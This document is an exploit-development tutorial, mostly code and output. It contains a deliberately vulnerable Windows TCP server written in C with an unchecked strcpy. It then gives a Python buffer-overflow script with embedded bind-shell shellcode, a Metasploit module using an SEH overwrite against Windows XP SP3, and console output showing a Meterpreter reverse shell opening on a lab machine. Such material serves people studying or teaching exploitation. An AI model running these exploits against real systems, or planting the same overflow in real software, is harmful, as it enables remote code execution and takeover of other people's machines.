exploit - write metasploit exploit script

Create Vuln Server

#include <iostream.h>
#include <stdio.h>
#include <winsock.h>
#include <windows.h>

//load windows socket
#pragma comment(lib, "wsock32.lib")

//Define Return Messages
#define SS_ERROR 1
#define SS_OK 0

void pr( char *str)
{
char buf[500]="";
strcpy(buf,str);
}

void sError(char *str)
{
MessageBox (NULL, str, "socket Error" ,MB_OK);
WSACleanup();
}

int main(int argc, char **argv)
{

WORD sockVersion;
WSADATA wsaData;

int rVal;
char Message[5000]="";
char buf[2000]="";

// server port: 9000
u_short LocalPort;
LocalPort = 9000;

//wsock32 initialized for usage
sockVersion = MAKEWORD(1,1);
WSAStartup(sockVersion, &wsaData);

//create server socket
SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0);

if(serverSocket == INVALID_SOCKET)
{
sError("Failed socket()");
return SS_ERROR;
}

SOCKADDR_IN sin;
sin.sin_family = PF_INET;
sin.sin_port = htons(LocalPort);
sin.sin_addr.s_addr = INADDR_ANY;

//bind the socket
rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin));
if(rVal == SOCKET_ERROR)
{
sError("Failed bind()");
WSACleanup();
return SS_ERROR;
}

//get socket to listen
rVal = listen(serverSocket, 10);
if(rVal == SOCKET_ERROR)
{
sError("Failed listen()");
WSACleanup();
return SS_ERROR;
}

printf("[+] listening on tcp/9000... \n");

//wait for a client to connect
SOCKET clientSocket;
clientSocket = accept(serverSocket, NULL, NULL);
if(clientSocket == INVALID_SOCKET)
{
sError("Failed accept()");
WSACleanup();
return SS_ERROR;
}

int bytesRecv = SOCKET_ERROR;
while( bytesRecv == SOCKET_ERROR )
{
//receive the data that is being sent by the client max limit to 5000 bytes.
bytesRecv = recv( clientSocket, Message, 5000, 0 );

if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET )
{
printf("\nConnection Closed.\n");
break;
}
}

//Pass the data received to the function pr
pr(Message);

//close client socket
closesocket(clientSocket);

//close server socket
closesocket(serverSocket);

WSACleanup();

return SS_OK;
}

Stack Overflow

#!/usr/bin/env python
# -*- coding: utf8 -*-

import socket

csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ret = csock.connect_ex(("127.0.0.1", 9000))

if (ret == 0):
junk = "A" * 500
eip = "\x7B\x46\x86\x7C"   # 7C86467B

# bad chars: 00

# windows/shell_bind_tcp - 355 bytes
# http://www.metasploit.com # Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=seh, InitialAutoRunScript=, AutoRunScript=
buf =  "\x90" * 20
buf += "\xba\x09\xb0\x2e\x7e\xdb\xc0\xd9\x74\x24\xf4\x5d\x31"
buf += "\xc9\xb1\x53\x83\xc5\x04\x31\x55\x0e\x03\x5c\xbe\xcc"
buf += "\x8b\xa2\x56\x92\x74\x5a\xa7\xf3\xfd\xbf\x96\x33\x99"
buf += "\xb4\x89\x83\xe9\x98\x25\x6f\xbf\x08\xbd\x1d\x68\x3f"
buf += "\x76\xab\x4e\x0e\x87\x80\xb3\x11\x0b\xdb\xe7\xf1\x32"
buf += "\x14\xfa\xf0\x73\x49\xf7\xa0\x2c\x05\xaa\x54\x58\x53"
buf += "\x77\xdf\x12\x75\xff\x3c\xe2\x74\x2e\x93\x78\x2f\xf0"
buf += "\x12\xac\x5b\xb9\x0c\xb1\x66\x73\xa7\x01\x1c\x82\x61"
buf += "\x58\xdd\x29\x4c\x54\x2c\x33\x89\x53\xcf\x46\xe3\xa7"
buf += "\x72\x51\x30\xd5\xa8\xd4\xa2\x7d\x3a\x4e\x0e\x7f\xef"
buf += "\x09\xc5\x73\x44\x5d\x81\x97\x5b\xb2\xba\xac\xd0\x35"
buf += "\x6c\x25\xa2\x11\xa8\x6d\x70\x3b\xe9\xcb\xd7\x44\xe9"
buf += "\xb3\x88\xe0\x62\x59\xdc\x98\x29\x36\x11\x91\xd1\xc6"
buf += "\x3d\xa2\xa2\xf4\xe2\x18\x2c\xb5\x6b\x87\xab\xba\x41"
buf += "\x7f\x23\x45\x6a\x80\x6a\x82\x3e\xd0\x04\x23\x3f\xbb"
buf += "\xd4\xcc\xea\x56\xdc\x6b\x45\x45\x21\xcb\x35\xc9\x89"
buf += "\xa4\x5f\xc6\xf6\xd5\x5f\x0c\x9f\x7e\xa2\xaf\x8e\x22"
buf += "\x2b\x49\xda\xca\x7d\xc1\x72\x29\x5a\xda\xe5\x52\x88"
buf += "\x72\x81\x1b\xda\x45\xae\x9b\xc8\xe1\x38\x10\x1f\x36"
buf += "\x59\x27\x0a\x1e\x0e\xb0\xc0\xcf\x7d\x20\xd4\xc5\x15"
buf += "\xc1\x47\x82\xe5\x8c\x7b\x1d\xb2\xd9\x4a\x54\x56\xf4"
buf += "\xf5\xce\x44\x05\x63\x28\xcc\xd2\x50\xb7\xcd\x97\xed"
buf += "\x93\xdd\x61\xed\x9f\x89\x3d\xb8\x49\x67\xf8\x12\x38"
buf += "\xd1\x52\xc8\x92\xb5\x23\x22\x25\xc3\x2b\x6f\xd3\x2b"
buf += "\x9d\xc6\xa2\x54\x12\x8f\x22\x2d\x4e\x2f\xcc\xe4\xca"
buf += "\x51\x3c\x34\xc7\xc6\xe7\xad\xaa\x8a\x17\x18\xe8\xb2"
buf += "\x9b\xa8\x91\x40\x83\xd9\x94\x0d\x03\x32\xe5\x1e\xe6"
buf += "\x34\x5a\x1e\x23"
nops = "\x90" * 1500

payload = junk + eip + buf + nops

csock.send(payload)

csock.close()

Write MSF exploit script

##
# This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh

def initialize(info={})
super(update_info(info,
'Name'            =>  'Custom Vulnable Tcp Server Buffer Overflow',
'Description'     =>  %q{
'This module exploits a custom windows tcp server'
},
'Author'          =>  [ 'Nixawk' ],
'License'         =>  MSF_LICENSE,
'DefaultOptions'  =>  {
'EXITFUNC'       => 'process',
'AllowWin32SEH'  => true
},
'Payload'         =>  {
'Space'            => 1400,
'BadChars'         => "\x00\xFF",
'StackAdjustment'  => -3500
},
'Platform'      => 'win',
'Targets'       =>
[
['Windows XP SP3 En', {'Ret' => 0x7C86467B, 'Offset' => 496}]
],

'Privileged'     => false,
'DefaultTarget'  => 0,
'DisclosureDate' => 'June 20 2015'
))

register_options([Opt::RPORT(9000)], self.class)

end

def exploit
# [*] Started reverse handler on 192.168.1.108:4444
# [-] Exploit failed: TypeError no implicit conversion of String into Integer
connect

sploit = rand_text(target['Offset'])
sploit << generate_seh_record(target.ret)
# sploit << make_nops(50)
sploit << payload.encoded

sock.put(sploit)

handler
disconnect
end
end

Exploit Vuln Server with MSF

msf exploit(custom_vulnserver) > show options

Module options (exploit/windows/misc/custom_vulnserver):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST  192.168.1.105    yes       The target address
RPORT  9000             yes       The target port

Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  seh              yes       Exit technique (Accepted: , , seh, thread, process, none)
LHOST     192.168.1.108    yes       The listen address
LPORT     8080             yes       The listen port

Exploit target:

Id  Name
--  ----
0   Windows XP SP3 En

msf exploit(custom_vulnserver) > exploit

[*] Started reverse handler on 192.168.1.108:8080
[*] Sending stage (884270 bytes) to 192.168.1.105
[*] Meterpreter session 2 opened (192.168.1.108:8080 -> 192.168.1.105:1557) at 2015-06-22 11:16:47 +0000

meterpreter > sysinfo
Computer        : CORELAN-LAB
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : zh_CN
Domain          : MSHOME
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter >

References